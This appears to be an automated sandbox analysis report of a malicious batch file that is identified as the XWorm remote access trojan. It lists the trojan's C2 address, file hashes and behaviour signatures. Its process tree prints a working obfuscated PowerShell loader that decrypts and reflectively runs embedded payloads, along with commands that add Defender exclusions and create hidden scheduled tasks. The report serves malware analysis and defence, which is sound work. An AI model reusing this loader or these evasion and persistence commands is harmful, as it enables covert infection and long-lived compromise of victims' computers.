Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

systeminformer.bat

windows10-1703-x64

10

systeminformer.bat

windows10-2004-x64

10

systeminformer.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27/06/2024, 07:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    systeminformer.bat

  • Size

    408KB

  • MD5

    34d172bddcf176f4a3c85f2b8083850c

  • SHA1

    6e4fd033d2ed62b464db43b6af1f5bb0e9283a46

  • SHA256

    ecb640f4a29fea8d3fb020aa2b41bdc446703c4b1ede6b5c72621229b270bf42

  • SHA512

    c52171f7c68902cfe5da18b2a76a59c5a27f1cec92ee330f57f18f9b257079b49d5ff445f4251ad13ba5886e274d5286e062c39cac3a77bbef71909502ab3516

  • SSDEEP

    12288:z4MdFDVqDtPSt2dbWRZpti8C6lhzFAxsbmC:z4UoSCAjti8C6l9eHC

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

case-shield.gl.at.ply.gg:26501

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    system.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 47 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
    1⤵
      PID:772
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch
      1⤵
      • Drops file in System32 directory
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Windows\system32\wbem\wmiprvse.exe
        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        2⤵
          PID:216
        • C:\Windows\system32\backgroundTaskHost.exe
          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
          2⤵
            PID:736
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
            2⤵
              PID:5024
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
              2⤵
                PID:3508
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                2⤵
                  PID:1936
                • C:\Windows\System32\rundll32.exe
                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                  2⤵
                    PID:2824
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k rpcss
                  1⤵
                    PID:884
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
                    1⤵
                      PID:932
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                      1⤵
                        PID:424
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:836
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                          1⤵
                            PID:1028
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                            1⤵
                            • Drops file in System32 directory
                            PID:1096
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                            1⤵
                              PID:1124
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                              1⤵
                              • Drops file in System32 directory
                              PID:1168
                              • C:\Users\Admin\system.exe
                                C:\Users\Admin\system.exe
                                2⤵
                                • Executes dropped EXE
                                PID:4540
                              • C:\Users\Admin\system.exe
                                C:\Users\Admin\system.exe
                                2⤵
                                • Executes dropped EXE
                                PID:948
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservice -s nsi
                              1⤵
                                PID:1192
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                1⤵
                                  PID:1240
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                  1⤵
                                    PID:1268
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                    1⤵
                                      PID:1276
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                      1⤵
                                        PID:1412
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                        1⤵
                                          PID:1464
                                          • \??\c:\windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:4100
                                            • \??\c:\windows\system32\sihost.exe
                                              sihost.exe
                                              2⤵
                                                PID:5012
                                              • \??\c:\windows\system32\sihost.exe
                                                sihost.exe
                                                2⤵
                                                  PID:4344
                                                • \??\c:\windows\system32\sihost.exe
                                                  sihost.exe
                                                  2⤵
                                                    PID:2756
                                                  • \??\c:\windows\system32\sihost.exe
                                                    sihost.exe
                                                    2⤵
                                                      PID:4928
                                                    • \??\c:\windows\system32\sihost.exe
                                                      sihost.exe
                                                      2⤵
                                                        PID:212
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                      1⤵
                                                        PID:1500
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                                        1⤵
                                                          PID:1580
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                                          1⤵
                                                            PID:1608
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                                            1⤵
                                                              PID:1632
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                              1⤵
                                                                PID:1716
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                                1⤵
                                                                  PID:1748
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                                  1⤵
                                                                    PID:1884
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                                    1⤵
                                                                      PID:1892
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                      1⤵
                                                                        PID:1948
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                                        1⤵
                                                                          PID:1956
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                                          1⤵
                                                                            PID:2120
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                            1⤵
                                                                              PID:2244
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                              1⤵
                                                                                PID:2276
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                1⤵
                                                                                  PID:2288
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                                  1⤵
                                                                                    PID:2348
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                                    1⤵
                                                                                      PID:2396
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                                      1⤵
                                                                                        PID:2452
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                        1⤵
                                                                                          PID:2476
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                          1⤵
                                                                                            PID:2532
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                            1⤵
                                                                                              PID:2608
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                              1⤵
                                                                                                PID:3004
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                                1⤵
                                                                                                  PID:3124
                                                                                                • C:\Windows\Explorer.EXE
                                                                                                  C:\Windows\Explorer.EXE
                                                                                                  1⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Modifies Internet Explorer settings
                                                                                                  • Modifies registry class
                                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:3320
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\systeminformer.bat"
                                                                                                    2⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4540
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zppN17iXtrCN9R2seJEth9hA/unISVpEyKgytiMsEXg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4HYls8iOlhSjNY1hAkSsQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jLbjH=New-Object System.IO.MemoryStream(,$param_var); $rbzqc=New-Object System.IO.MemoryStream; $LPpaN=New-Object System.IO.Compression.GZipStream($jLbjH, [IO.Compression.CompressionMode]::Decompress); $LPpaN.CopyTo($rbzqc); $LPpaN.Dispose(); $jLbjH.Dispose(); $rbzqc.Dispose(); $rbzqc.ToArray();}function execute_function($param_var,$param2_var){ $NeELi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OenrY=$NeELi.EntryPoint; $OenrY.Invoke($null, $param2_var);}$rPKgK = 'C:\Users\Admin\AppData\Local\Temp\systeminformer.bat';$host.UI.RawUI.WindowTitle = $rPKgK;$pVvBN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rPKgK).Split([Environment]::NewLine);foreach ($VGOfr in $pVvBN) { if ($VGOfr.StartsWith('vcAjailoeyOprdqWzxUu')) { $mEApY=$VGOfr.Substring(20); break; }}$payloads_var=[string[]]$mEApY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                      3⤵
                                                                                                        PID:4428
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                        3⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4436
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_454_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_454.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                          4⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3020
                                                                                                        • C:\Windows\System32\WScript.exe
                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_454.vbs"
                                                                                                          4⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4112
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_454.bat" "
                                                                                                            5⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:4960
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zppN17iXtrCN9R2seJEth9hA/unISVpEyKgytiMsEXg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4HYls8iOlhSjNY1hAkSsQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jLbjH=New-Object System.IO.MemoryStream(,$param_var); $rbzqc=New-Object System.IO.MemoryStream; $LPpaN=New-Object System.IO.Compression.GZipStream($jLbjH, [IO.Compression.CompressionMode]::Decompress); $LPpaN.CopyTo($rbzqc); $LPpaN.Dispose(); $jLbjH.Dispose(); $rbzqc.Dispose(); $rbzqc.ToArray();}function execute_function($param_var,$param2_var){ $NeELi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OenrY=$NeELi.EntryPoint; $OenrY.Invoke($null, $param2_var);}$rPKgK = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_454.bat';$host.UI.RawUI.WindowTitle = $rPKgK;$pVvBN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rPKgK).Split([Environment]::NewLine);foreach ($VGOfr in $pVvBN) { if ($VGOfr.StartsWith('vcAjailoeyOprdqWzxUu')) { $mEApY=$VGOfr.Substring(20); break; }}$payloads_var=[string[]]$mEApY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                              6⤵
                                                                                                                PID:4964
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                6⤵
                                                                                                                • Blocklisted process makes network request
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops startup file
                                                                                                                • Adds Run key to start application
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:816
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                                                  7⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:2312
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                                                  7⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:2572
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system.exe'
                                                                                                                  7⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5028
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
                                                                                                                  7⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:4780
                                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system" /tr "C:\Users\Admin\system.exe"
                                                                                                                  7⤵
                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                  PID:1492
                                                                                                      • C:\Windows\system32\taskmgr.exe
                                                                                                        "C:\Windows\system32\taskmgr.exe" /7
                                                                                                        2⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:3376
                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                                      1⤵
                                                                                                        PID:4812
                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                                        1⤵
                                                                                                          PID:4652
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                          1⤵
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:4156
                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                          1⤵
                                                                                                            PID:4472

                                                                                                          Network

                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                            Filesize

                                                                                                            3KB

                                                                                                            MD5

                                                                                                            ad5cd538ca58cb28ede39c108acb5785

                                                                                                            SHA1

                                                                                                            1ae910026f3dbe90ed025e9e96ead2b5399be877

                                                                                                            SHA256

                                                                                                            c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                                                                                                            SHA512

                                                                                                            c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                                                                                                            Download Submit

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                            Filesize

                                                                                                            50KB

                                                                                                            MD5

                                                                                                            2143b379fed61ab5450bab1a751798ce

                                                                                                            SHA1

                                                                                                            32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

                                                                                                            SHA256

                                                                                                            a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

                                                                                                            SHA512

                                                                                                            0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

                                                                                                            Download Submit

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            aeb24b5729d62e81a27174f46d431126

                                                                                                            SHA1

                                                                                                            baa02ac3f99822d1915bac666450dc20727494bb

                                                                                                            SHA256

                                                                                                            d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471

                                                                                                            SHA512

                                                                                                            e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415

                                                                                                            Download Submit

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            0d4a279d2292b7b5d943e8839c4a5b67

                                                                                                            SHA1

                                                                                                            e84d64f4579c7e4d326d7bccc8915e16ad4f22c2

                                                                                                            SHA256

                                                                                                            25ec6032815b69f0bb2fbd4f018f8b3c87259daa89ed9f0ca871334f6d8e102f

                                                                                                            SHA512

                                                                                                            cd0f7a367794b39624593199c01cb4886d7baa0a829b76395ab1890d587456f3fdc2ae481827a41571917e3f780d09d32b39d288d3755edcdd56597507a7d180

                                                                                                            Download Submit

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            b70f376eb6b0944741c4086a001a49be

                                                                                                            SHA1

                                                                                                            1b5fc59b592d7d267d48db7c7714c7c1e55e37e3

                                                                                                            SHA256

                                                                                                            82481965e29d9c6d4a2d14440e0e9300fcaa01f24bced067cf752f897d892117

                                                                                                            SHA512

                                                                                                            434d5bfff2f7baad98d7d08a17abf77745a25f42ebe0f1ab11d8902ec2a8235435a678a107bedd8b4f3bedef8df8a5fb0d8172cd695562ed69e2ed7c4b52f9d1

                                                                                                            Download Submit

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            2ee07d41132442e33452cbac9e4beb76

                                                                                                            SHA1

                                                                                                            201d7a8efd011a34678268110277982330b7a7b8

                                                                                                            SHA256

                                                                                                            7c8a89c49b57811ebacdc1dfc0a5938f6f3e83758cb0de46c99487dc22b3a950

                                                                                                            SHA512

                                                                                                            458bedecd5966392b1ac14050427864df2bffe28130be8180250e76781f142e10aeb9cc38eae31815f4ecb07e34b319d67dfbfdf4487aba6cbc4048c29ed2b7d

                                                                                                            Download Submit

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            cf3f4df0e6140340cb5f4eed6c2ee5a6

                                                                                                            SHA1

                                                                                                            81b1f4c656cf5075b84983a1f341114694e3d56d

                                                                                                            SHA256

                                                                                                            0d1a4ad17e72e14556fba8b42c3242022ee7972f2a60b07e6f61e0d68ba36f00

                                                                                                            SHA512

                                                                                                            dc35a32862c84c1ab5006a98f6b3c69a29d5d3a285496afe73ab9c85582197aec0ef527b7bfe5c08597db08aa89a1ade59862b3889923679d3514e9e956e774d

                                                                                                            Download Submit

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3tyvmyjl.0lm.ps1
                                                                                                            Filesize

                                                                                                            1B

                                                                                                            MD5

                                                                                                            c4ca4238a0b923820dcc509a6f75849b

                                                                                                            SHA1

                                                                                                            356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                            SHA256

                                                                                                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                            SHA512

                                                                                                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                            Download Submit

                                                                                                          • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_454.bat
                                                                                                            Filesize

                                                                                                            408KB

                                                                                                            MD5

                                                                                                            34d172bddcf176f4a3c85f2b8083850c

                                                                                                            SHA1

                                                                                                            6e4fd033d2ed62b464db43b6af1f5bb0e9283a46

                                                                                                            SHA256

                                                                                                            ecb640f4a29fea8d3fb020aa2b41bdc446703c4b1ede6b5c72621229b270bf42

                                                                                                            SHA512

                                                                                                            c52171f7c68902cfe5da18b2a76a59c5a27f1cec92ee330f57f18f9b257079b49d5ff445f4251ad13ba5886e274d5286e062c39cac3a77bbef71909502ab3516

                                                                                                            Download Submit

                                                                                                          • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_454.vbs
                                                                                                            Filesize

                                                                                                            124B

                                                                                                            MD5

                                                                                                            d52bae4c19075e66287edaaf3b31b708

                                                                                                            SHA1

                                                                                                            6b6b4e56f9f9c4d58350e67bb195c01bfb78f725

                                                                                                            SHA256

                                                                                                            6502efb861197052f225894f547b1631e5dec211a2b9c8fe6a1b8e5c836fed53

                                                                                                            SHA512

                                                                                                            c1136dca6955077d39adfc6aa90f19a8ad8e990bda56f00b8c1347af2173abc2e607a614ce4f65242db9d4c376a0312ce9b433d38481fe7862b7155228bae7c4

                                                                                                            Download Submit

                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk
                                                                                                            Filesize

                                                                                                            775B

                                                                                                            MD5

                                                                                                            5f8c70cab61eefb1769efa7cedd59c5a

                                                                                                            SHA1

                                                                                                            39e81433bdc7c8413acd94cfd5edb91afcec279a

                                                                                                            SHA256

                                                                                                            95fd703952a427a8b48fe0afa69a9f2f3bebb4f849d33f2b81bdd4512dcbc110

                                                                                                            SHA512

                                                                                                            ccdc5640602829379362d97d37871937df7d4cf66394e99e780ec134f1f72d2c1c3b8a7f343036e895e29dabe2dbb422f0249a2710817e1a586de64f5b765b7b

                                                                                                            Download Submit

                                                                                                          • C:\Users\Admin\system.exe
                                                                                                            Filesize

                                                                                                            435KB

                                                                                                            MD5

                                                                                                            f7722b62b4014e0c50adfa9d60cafa1c

                                                                                                            SHA1

                                                                                                            f31c17e0453f27be85730e316840f11522ddec3e

                                                                                                            SHA256

                                                                                                            ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

                                                                                                            SHA512

